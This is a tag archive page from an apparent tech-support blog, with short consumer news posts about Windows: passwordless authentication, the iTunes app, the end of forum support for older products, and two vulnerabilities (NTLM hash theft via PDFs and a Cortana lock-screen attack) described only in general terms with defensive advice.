Tag: Windows

Passwords May Be Dead Soon If Microsoft Gets Its Way 

Karanbir Singh (a program manager at Microsoft) is on a mission:

Kill the password.

As he said in a recent blog post:

“Nobody likes passwords.  They are inconvenient, insecure, and expensive.  In fact, we dislike them so much that we’ve been busy at work trying to create a world without them–a world without passwords.”

The company’s stated goal is to make it possible that an end user will never have to bother with passwords on a day to day basis and would instead provide credentials that are virtually impossible for hackers to crack or breach.

To accomplish this goal, the company is looking at a number of options, including biometrics and multi-factor authentication schemes.

Singh notes that this isn’t just blue-sky thinking, either.  Already, more than 47 million users and more than five thousand businesses are utilizing “Windows Hello for Business.”  Another solution currently in use is the Microsoft Authenticator app, which allows users to access their Microsoft accounts via their smartphones.

Additionally, as part of the Windows 10 update issued in April (2018), any user with a Managed Service Account or Azure Active Directory can now access their Windows 10 PC without having to enter their password, via the authenticator app and Windows Hello (provided that S-mode is enabled).

The company is also taking advantage of the newly ratified Fast Identity Online (FIDO2) security protocol, and is in the process of updating Windows Hello to enable secure authentication across a wider range of scenarios.  For example:  The company is currently working on a proof of concept for shared PCs that will allow users to log on via FIDO2 security keys, which will allow employees to carry their credentials with them.

They envision a scenario in which any user can simply walk up to any device the organization controls and authenticate without ever having to enter their username or password. This would be especially useful for analysts, help desk personnel, and anyone working in the medical profession.

Obviously no firm timeframes have been given, but as mentioned, some of these technologies are already in use and will be refined in the months ahead.

Windows 10 Gets iTunes App For Apple Users

Apple promised that its iTunes app would be available on the Microsoft Store by the end of 2017.  The announcement was greeted with enthusiasm, but unfortunately, the company didn’t meet their own deadline. They cited the need for more time to build a more robust user experience for Windows users.

The wait is finally over, and its big news, because some Windows 10 machines can only download apps, and prior to this, iTunes was offered as a standalone download only.

The app is fairly sizeable, weighing in at 476.7MB, and is compatible with both x86 and x64 PCs.

A recent Microsoft blog post had this to say about the announcement:

“Now you can download iTunes from Microsoft Store and easily play your favorite music, movies and more – right from your Windows 10 PC.  iTunes is also home to Apple Music, where you can listen ad-free to over 45 million songs and download your favorites to enjoy without using WiFi.  iTunes is free to download, and you can try Apple Music free for three months.  There’s no commitment, and you can cancel anytime.”

One thing to be aware of is that if you already have an older version of iTunes installed on your machine and you download this app, it will automatically replace your older version.  It is recommended, therefore, that you back up your data before downloading the latest.  While it does offer a better user experience, it’s not worth the loss of your existing library of files.

Kudos to both Apple and Microsoft here. Apple for bringing an excellent free app to the Microsoft Store, and Microsoft for continuing to play nice with their longtime rival, and allowing their massive user base the pleasure of enjoying a portion of Apple’s wonderfully robust ecosystem.

Microsoft Ending Forum Support For Older Operating Systems

Big changes are coming from Microsoft starting in July (exact date unknown), and it has potentially dire implications if you’re using some of the company’s older technology.

Microsoft announced that in July, they’ll no longer provide forum-based support for a wide range of products and software, including:

  • Microsoft Band
  • Zune
  • Surface Pro
  • Surface Pro 2
  • Surface RT
  • Surface 2
  • Microsoft Security Essentials
  • Internet Explorer 10
  • Office 2010
  • Office 2013
  • Windows 7
  • Windows 8.1
  • Windows 8.1 RT

Although the company didn’t cite a specific reason for the change, it seems obvious that this is another move to push people into buying the latest and greatest of the company’s offerings.  Unfortunately for them, the announcement has been met with more than a little hostility, and for good reason.

Consider that the company has pledged to continue to support Windows 7 until 2020, and Windows 8.1 (and variants) until 2023.  Given that we’re still quite some distance from those EOL dates, closing an important avenue of support for a product the company is still ostensibly supporting seems a bit premature.  Nonetheless, there’s no indication at this time that the company has plans to extend the forum support for any of these products beyond July.

In some instances, this won’t prove to be problematic.  Few people still use Internet Explorer 10 as anything more than a curiosity, and Zune was never especially popular, so the loss of those forums isn’t likely to cause much backlash. However,  in the case of Windows 7 and 8.1, not only has the company pledged support for years to come, but those products are still actively used by a significant minority around the world, and those users aren’t thrilled with the recent announcement.

In any case, given that the company is unlikely to change course, this is all the more reason to make upgrading a priority if you’re still using any of the products mentioned above.

Hackers Can Use PDF Files To Access Windows Credentials

Security researcher Assaf Baharav from Check Point Security has discovered a new twist on an old, fairly well-known attack.  He was able to essentially “weaponize” PDFs to steal Windows credentials stored in NTLM hashes.  Unfortunately, no action other than simply opening the PDF is required for the hacker to gain access to the information.

Baharav used the same methodology that hackers have used in the past, which amounts to instantiating SMB requests from inside the document.  Hackers have already performed these types of attacks from inside web browsers, Windows shortcut files, shared folders, Microsoft Office documents, and Microsoft outlook. Using a PDF to run the exploit is something new.

Baharav had this to say about his research:

“We chose to test these two high profile readers (Adobe Acrobat and the FoxIT reader).  Regarding the others, we highly suspect they may be vulnerable as well.  We followed a 90 days disclosure policy by notifying only Adobe and Foxit regarding the issues.”

Foxit did not respond to the information Baharav sent, but Adobe did.  Unfortunately, their response was not encouraging.  They simply announced that they had no plans to address the issue, deferring to Windows OS-level mitigations (reference Microsoft Security Advisory ADV170014).

Microsoft released this advisory to provide instructions on how to disable the NTLM SSO authentication inside the Windows operating system.  This is a workable solution, but it has problems.

For starters, it’s not really a patch, but rather the modification of a specific registry key and then the implementation of a network isolation policy.  Worse, it’s only applicable to Windows 10 and Windows Server 2016 machines.  People who have older systems are simply left vulnerable.

Be on the alert then PDFs can now be used to steal credentials.  It appears that every reader is affected and that no help is coming for older systems.

Turn Cortana Off At Lock Screen To Avoid Potential Hack

Do you use Cortana?  It’s a handy virtual assistant (like Siri) built into Windows 10.  Unfortunately, as useful as she is, there’s a problem. Even if you don’t use Cortana yourself, take heed:  Microsoft has recently issued a security update based on findings by McAfee researchers.

It turns out that Cortana can be “summoned” from the lock screen of your PC and used to execute attacks by tricking the ever-helpful Cortana into indexing files from a USB drive, then executing them.

To accomplish the attack, the hacker would need physical access to the PC. Once they had that, they could easily execute Powershell scripts to reset your Windows 10 password, which would then give them unfettered access.

The vulnerability takes advantage of two things:  First, Cortana “listens” for commands, even while the PC is locked. Then, the OS indexes files constantly so that they’re ready to use at a moment’s notice.  Put those two elements together and you have the makings of a disaster.

Microsoft has rushed a patch out the door to address the issue. For now, the company is advising users to simply disable Cortana on the lock screen, so that your PC has to be unlocked in order for her to be active.  It’s probably good advice, given that not all companies update their OS as soon as patches are available, and this one is important.

To be safe, even if you don’t use Cortana, go into settings and disable the virtual assistant on the lock screen.  Then, when you’re away from your PC, at least that’s one less thing you have to worry about.

Unfortunately, this isn’t the first Cortana-related security issue we’ve seen, and it’s not likely to be the last.  As useful as the feature is, it does open the door to a number of other (potential) problems.  Stay vigilant.